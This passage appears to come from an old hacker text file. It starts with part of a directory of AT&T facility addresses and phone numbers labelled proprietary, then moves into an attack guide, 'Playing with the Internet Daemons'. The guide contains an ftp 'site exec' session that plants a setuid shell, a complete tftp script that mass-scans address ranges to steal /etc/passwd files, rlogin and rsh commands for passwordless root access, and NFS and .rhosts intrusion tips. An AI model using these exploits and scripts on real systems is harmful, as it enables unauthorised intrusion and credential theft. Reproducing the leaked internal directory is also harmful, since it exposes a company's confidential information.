- AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674
- INDIANAPOLIS INST.8700ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160
- INDIANA AMO N. 151 N.DELAWARE ST. SUITE565 INDIANAPOL IN 46204 317-632-9161
- INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011
- INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980
- AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000
- KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000
- AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840
- AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500
- AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000
- AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300
- AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600
- AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041
- SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000
- AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400
- AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161
- ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000
- AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600
- MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000
- AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800
- AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870
- AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000
- NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765
- AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000
- BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000
- AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400
- COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234
- FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700
- COULUMBIA MD 9305D GERWIG LN. COLUMBIA MD 21046 301-381-6150
- AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700
- TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425
- AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400
- AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210
- AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200
- NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400
- AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200
- AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803
- MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750
- AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300
- AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600
- BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000
- ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000
- AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400
- AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500
- KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000
- KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000
- NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110
- REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100
- BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000
- GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000
- NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775
- AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800
- AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301
- AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023
- AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050
- AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001
- OMAHA AMO 222 S. 15th.ST, SUITE 200 S. OMAHA NE 68124 402-595-5001
- OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000
- AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000
- AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100
- SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100
- PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000
- PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700
- PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000
- AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600
- AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000
- AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000
- AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200
- LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000
- AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527
- CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000
- SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000
- AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200
- QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333
- AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100
- TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000
- FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000
- AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000
- AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000
- AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000
- RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000
- AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000
- W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000
- SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555
- AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000
- AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000
- BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000
- AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900
- AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300
- AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000
- AT&T-COMM. TR. 202-206N. BEDMINSTER NJ 07921 201-234-4000
- BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
- BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
- BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701
- AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400
- MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000
- AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000
- MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700
- AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000
- AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200
- MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000
- AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000
- AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000
- AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000
- SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000
- MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000
- AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000
- WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000
- PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020
- HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234
- HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500
- AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000
- LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000
- AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000
- AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000
- AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000
- AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000
- AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000
- AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700
- AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028
- AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000
- AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000
- AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000
- AT&T 371 HOES LN. PISCATAWAY NJ 08854 201-463-2200
- AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900
- AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300
- AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200
- HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000
- AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300
- SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678
- AT&T 220 EDISON WAY RENO NV 89502 702-239-7015
- AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396
- AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800
- 550 MADISON AVE. NEW YORK NY 10022 212-605-5500
- NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900
- AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700
- SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600
- AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000
- ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615
- AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900
- AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744
- AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800
- AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000
- BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711
- AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400
- CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454
- COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000
- AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700
- AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500
- ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980
- NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800
- AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000
- AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000
- AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883
- AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800
- AT&T 4 GATEWAY CTR. SUITE 500 PITTSBURGH PA 15222 412-392-8200
- AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845
- HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251
- ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700
- AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000
- AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900
- ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200
- AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800
- AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400
- AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250
- AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300
- KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600
- READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011
- AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720
- AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800
- AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000
- AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222
- AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950
- NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111
- AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400
- AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700
- DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000
- AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790
- AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000
- AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400
- AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400
- AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700
- AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400
- AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000
- AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435
- AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700
- AT&T-NS 10521 ROSEHAVEN ST. FAIRFAX VA 22030 703-352-0900
- AT&T-NS 12450 FAIR LAKES CIRCLE FAIRFAX VA 22033 703-631-3288
- AT&T-BELL LABS 1201 S. HAYES ST. ARLINGTON VA 22202 703-769-8900
- AT&T 1550 WILSON BLVD. ARLINGTON VA 22209 703-247-4690
- AT&T FED SYS 1201 S. HAYES ST. ARLINGTON VA 22209 703-685-8678
- AT&T MAJOR MKT & SALES 600 EAST BROAD ST. RICHMOND VA 23219 804-775-3300
- AT&T OSO 1530 E. RUN RD. RICHMOND VA 23228 804-262-4062
- RICHMOND WORKS 4500 S. LABURNUM AVE. RICHMOND VA 23231 804-226-5000
- AT&T 1338 PLANTATION RD NE ROANOKE VA 24012 703-344-1160
- NEW RIVER VALLEY CALLER 21 RADFORD VA 24143 703-731-8000
- AT&T 2901 THIRD AVE. SEATTLE WA 98121 206-443-7000
- AT&T ACCT MGMT 2121 4TH AVE. SEATTLE WA 98121 206-728-4749
- AT&T N. 9 POST SUITE 330 SPOKANE WA 99201 509-747-6110
- AT&T 400 S. EXECUTIVE DR. BROOMFIELD WI 53005 414-785-9110
- MILWAUKEE CP/ASSEM.CTR MILWAUKEE WI 53212 414-963-8200
- AT&T 2802 INTERNAT'L LN, 2ND FLR MADISON WI 53704 608-241-8900
- AT&T 900 PENNSYLVANIA AVE. CHARLESTON WV 25302 304-347-2000
- MARTINSBURG MMC TABLER STA.RD. MARTINSBRG WV 25401 304-263-6931
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- And remember...
-
- All directory information is classified AT&T Proprietary and, as such, should
- be safeguarded as outlined in GEI 2.2. Responsibility for security is passed
- on to each employee receiving the directory.
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
-
- Playing with the Internet Daemons
-
- by
-
- Voyager [TNO]
-
-
- Internet hosts communicate with each other using either TCP
- (Transmission Control Protocol) or UDP (User Datagram Protocol) on top
- of IP (Internet Protocol). Other protocols are used on top of IP, but
- TCP and UDP are the ones that are of interest to us. On a Unix system,
- the file /etc/protocols will list the available protocols on your
- machine
-
- On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
- Model) data is moved between hosts by using ports. Each data
- communication will have a source port number and a destination port
- number. Port numbers can be divided into two types, well-known ports
- and dynamically allocated ports. Under Unix, well-known ports are
- defined in the file /etc/services. In addition, RFC (Request For
- Comments) 1700 "Assigned Numbers" provides a complete listing of all
- well-known ports. Dynamically allocated port numbers are assigned as
- needed by the system.
-
- Unix provides the ability to connect programs called daemons to
- well-known ports. The remote computer will connect to the well-known
- port on the host computer, and be connected to the daemon program.
-
- Daemon programs are traditionally started by inetd (The Internet
- Daemon). Daemon programs to be executed are defined in the inetd
- configuration file, /etc/inetd.conf.
-
- Most of these daemons run as a priveledged user, often as root. Many of
- these programs have vulnerabilities which can be exploited to gain access
- to remote systems.
-
- The daemons we are interested in are:
-
- Service Port Number Description
- ~~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ftp 21 File Transfer [Control]
- smtp 25 Simple Mail Transfer Protocol
- tftp 69 Trivial File Transfer Protocol
- finger 79 Finger
- www-http 80 World Wide Web HTTP
- sunrpc 111 SUN Remote Procedure Call
- fln-spx 221 Berkeley rlogind with SPX auth
- rsh-spx 222 Berkeley rshd with SPX auth
- netinfo 716-719 NetInfo
- ibm-res 1405 IBM Remote Execution Starter
- nfs 2049 Network File System
- x11 6000-6063 X Window System
-
- rcp/rshd Remote Copy/Remote Shell Daemon
- nis Network Information Services
-
-
-
-
-
- The next part of this article will focus on specific daemons and their
- known vulnerabilities. The vulnerabilities with brief explanations will be
- explained here. For the more complicated exploits, which are beyond the
- scope of a concise article, more research will be required on the part of
- the reader.
-
-
-
- --> ftp 21 File Transfer [Control]
-
- FTP is the File Transfer Protocol. FTP requests are answered by the FTP
- daemon, ftpd. wuarchive's ftpd versions below 2.2 have a vulnerability
- where you can execute any binary you can see with the 'site exec'
- command by calling it with a relative pathname with "../" at the
- beginning. Here is a sample exploit:
-
- Login to the system via ftp:
-
- 220 uswest.com FTP server (Version wu-2.1(1) ready.
- Name (uswest.com:waltman): waltman
- 331 Password required for waltman.
- Password: jim
- 230 User waltman logged in.
- Remote system type is UNIX.
- Using binary mode to transfer files.
- ftp> quote "site exec cp /bin/sh /tmp/.tno"
- 200-cp /bin/sh /tmp/tno
- ftp> quote "site exec chmod 6755 /tmp/.tno"
- 200-chmod 6755 /tmp/tno
- ftp> quit
- 221 Goodbye.
-
-
-
- --> smtp 25 Simple Mail Transfer Protocol
-
- Mail attacks are one of the oldest known methods of attacking Internet
- hosts. The most common mail daemon, and least secure, is sendmail. Other
- mail daemons include smail, MMDF,and IDA sendmail. Sendmail has had too
- many vulnerabilities to list them all. There is an entire FAQ written
- specifically on sendmail vulnerabilities, therefore we will not cover them
- heavily here.
-
- One well known vulnerability, useful only for historical purposes, is
- "Wizard Mode." In Wizard mode you could request a shell via Port 25
- (The SMTP port). No modern system will be vulnerable to this attack. To
- exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
- Wizard mode, and entered the password. The problem related to the way
- the encrypted password was stored. There was a bug that caused the
- system to believe that no password was as good as the real password.
-
- To quote Steven Bellovin:
-
- The intended behavior of wizard mode was that if you supplied
- the right password, some other non-standard SMTP commands were
- enabled, notably one to give you a shell. The hashed password
- -- one-way encrypted exactly as per /etc/passwd -- was stored in
- the sendmail configuration file. But there was this bug; to
- explain it, I need to discuss some arcana relating to sendmail
- and the C compiler.
-
- In order to save the expense of reading and parsing the
- configuration file each time, sendmail has what's known as a
- ``frozen configuration file''. The concept is fine; the
- implementation isn't. To freeze the configuration file,
- sendmail just wrote out to disk the entire dynamic memory area
- (used by malloc) and the `bss' area -- the area that took up no
- space in the executable file, but was initialized to all zeros
- by the UNIX kernel when the program was executed. The bss area
- held all variables that were not given explicit initial values
- by the C source. Naturally, when delivering mail, sendmail just
- read these whole chunks back in, in two giant reads. It was
- therefore necessary to store all configuration file information
- in the bss or malloc areas, which demanded a fair amount of care
- in coding.
-
- The wizard mode password was stored in malloc'ed memory, so it
- was frozen properly. But the pointer to it was explicitly set
- to NULL in the source:
-
- char *wiz = NULL;
-
- That meant that it was in the initialized data area, *not* the
- bss. And it was therefore *not* saved with the frozen
- configuration. So -- when the configuration file is parsed and
- frozen, the password is read, and written out. The next time
- sendmail is run, though, the pointer will be reset to NULL.
- (The password is present, of course, but there's no way to find
- it.) And the code stupidly believed in the concept of no
- password for the back door.
-
- One more point is worth noting -- during testing, sendmail did
- the right thing with wizard mode. That is, it did check the
- password -- because if you didn't happen to do the wizard mode
- test with a frozen configuration file -- and most testing would
- not be done that way, since you have to refreeze after each
- compilation -- the pointer would be correct.
-
-
-
- --> tftp 69 Trivial File Transfer Protocol
-
- tftp is the Trivial File Transfer Protocol. tftp is most often used to
- attempt to grab password files from remote systems. tftp attacks are so
- simple and repetitive that scripts are written to automate the process
- of attacking entire domains. Here is one such script:
-
- #!/bin/sh
- ########################################################################
- # TFTP snagger by Yo
- # It snags /etc/passwd files from all hosts with open 69 (tftp) port.
- # scans all hosts from XX.XX.0.0 - XX.XX.255.255
- # you can run it in the background in following way:
- # snag [hostname] > /dev/null &
- # [hostname] might be used IP # (with -ip option) as well as FQDN
- # Last Updated 10/20/92
- #
- # Highly modified by ThePublic on 10/21/92
- ########################################################################
- case $1 in
- '')
- echo " Usage: $0 [hostname] to run in the foreground "
- echo " $0 [hostname] > /dev/null & to run in the background "
- echo " The [hostname] can be specialized in fully qualified domain name "
- echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
- echo " as well as IP with -ip option. "
- exit 1
- ;;
- -ip)
- if [ $2x = x ]; then
- echo " Usage: $0 $1 the IP "
- exit 1
- else
- x=`echo $2 | cut -d. -f1`
- xx=`echo $2 | cut -d. -f2`
- xxx=`echo $2 | cut -d. -f3`
- xxxx=`echo $2 | cut -d. -f4`
- # ^ field delimiter is '.' -- get field 1/2/3/4
- fi;;
- *)
- if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
- # -x is for SunOs
- echo sorry dude, no nslookup server .. try it with -ip option.
- exit 1
- fi
- x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
- # ^ 7 chars ^ last line
- if [ "$x1" = '' ]; then
- echo " There is no such domain. Nothing to scan. Exit. "
- exit 1
- fi
- x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ###
- xx=`echo $x1 | cut -d. -f2` # get the second set
- xxx=0 # ignore the rest, if any
- xxxx=0
- ;;
- esac
- if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
- echo There is no such domain. Nothing to scan.
- exit 1
- fi
- while [ $x -ne 255 ]; do
-
- while [ $xx -ne 255 ]; do
- while [ $xxx -ne 255 ]; do
- while [ $xxxx -ne 255 ]; do
- target=$x.$xx.$xxx.$xxxx
- trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1"
- 2
- tftp << EOF
- c $target
- mode ascii
- trace
- get /etc/passwd passwd.$target
- quit
- EOF
- if [ ! -s passwd.$target ] ; then
- rm -rf passwd.$target
- echo `date` $target has rejected an attempt >> .info
- else
- mv passwd.$target .good.$target
- echo `date` $target is taken, all data is stored in .good.$target file >>
- .info
- fi
- xxxx=`expr $xxxx + 1 `
- done
- xxxx=0
- xxx=`expr $xxx + 1 `
- done
- xxx=0
- xx=`expr $xx + 1 `
- done
- xx=0
- x=`expr $x + 1 `
- done
-
-
-
- --> finger 79 Finger
-
- The finger command displays information about another user, such as login
- name, full name, terminal name, idle time, login time, and location if
- known. finger requests are answered by the fingerd daemon.
-
- Robert Tappan Morris's Internet Worm used the finger daemon. The finger
- daemon allowed up to 512 bytes from the remote machine as part of the
- finger request. fingerd, however, suffered from a buffer overflow bug
- caused by a lack proper bounds checking. Anything over 512 got
- interpreted by the machine being fingered as an instruction to be
- executed locally, with whatever privileges the finger daemon had.
-
-
-
- --> www-http 80 World Wide Web HTTP
-
- HTML (HyperText Markup Language) allows web page user to execute
- programs on the host system. If the web page designer allows the web
- page user to enter arguments to the commands, the system is vulnerable
- to the usual problems associated with system() type calls. In addition,
- there is a vulnerability that under some circumstances will give you an
- X-Term using the UID that the WWW server is running under.
-
-
-
- --> sunrpc 111 SUN Remote Procedure Call
-
- Sun RPC (Remote Procedure Call) allows users to execute procedures on
- remote hosts. RPC has suffered from a lack of secure authentification.
- To exploit RPC vulnerabilities, you should have a program called "ont"
- which is not terribly difficult to find.
-
-
-
- --> login 513 Remote login
-
- Some versions of AIX and Linux suffer from a bug in the way that
- rlogind reads arguments. To exploit this vulnerability, issue this
- command from a remote system:
-
- rlogin host -l -froot
-
- Where host is the name of the target machine and username is the username
- you would like to rlogin as (usully root). If this bug exists on the
- hosts system, you will be logged in, without being asked for a password.
-
-
-
- --> rsh-spx 222 Berkeley rshd with SPX auth
-
- Some versions of Dynix and Irix have a bug in rshd that allows you to
- run commands as root. To exploit this vulnerability, issue this command
- from the remote system:
-
- rsh host -l "" /bin/sh
-
-
-
- --> netinfo 716-719 NetInfo
-
- NeXT has implemented a protocol known as NetInfo so that one NeXT
- machine can query another NeXT machine for information. A NetInfo
- server will by default allow unrestricted access to system databases.
- This can be fixed by the System Administrator. One of the pieces of
- information netinfo will give up is the password file.
-
-
-
- --> ibm-res 1405 IBM Remote Execution Starter
-
- rexd (the remote execution daemon) allows you to execute a program on
- another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered
- from a vulnerability allowing unintended remote execution. The rexd
- daemon checks your uid on the machine you are coming from, therefore you
- must be root on the machine you are mounting the rexd attack from. To
- determine if your target machine is running rexd, use the 'rcp -p
- <target>' command. You will also need the exploit program known as 'on'
- which is available on fine H/P boards everywhere.
-
-
-
- --> nfs 2049 Network File System
-
- NFS, the Network File System, from Sun Microsystems has suffered from
- multiple security vulnerabilities. In addition, many system
- administrators configure NFS incorrectly, allowing unintended remote
- access.
-
- Using the command 'showmount -e <target>' you can view what file systems
- are exported from a machine. Many administrators allow read access to
- the /etc directory, allowing you to copy the password file. Other
- administrators allow write access to user directories, allowing you to
- create .rhosts files and gain access to the machine via rlogin or rsh.
-
- In addition to configuration issues, NFS is vulnerable to attacks using
- a uid masking bug, a mknod bug, and a general file handle guessing
- attack. Several hacked versions of the mount command have been written
- to exploit known vulnerabilities.
-
-
-
- --> x11 6000-6063 X Window System
-
- X-Windows has suffered and currently suffers from numerous
- vulnerabilities. One vulnerability allows you to access another users
- display, another allows you to view another users keystrokes. Another
- vulnerability allows a remote attacker to run every program that the
- root user starts in his or her .xsession file. Yet another X-Windows
- vulnerability allows a local user to create a root entry in the
- /etc/passwd file.
-
-
-
- --> rcp
-
- The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
- in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be
- running NFS (Network File System) on a Unix system or PC/NFS on a DOS
- system.
-
-
-
- --> NIS
-
- Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
- has a vulnerability where you can request an NIS map from another NIS
- domain if you know the NIS domain name of the target system. There is
- no way to query a remote system for it's NIS domainname, but many NIS
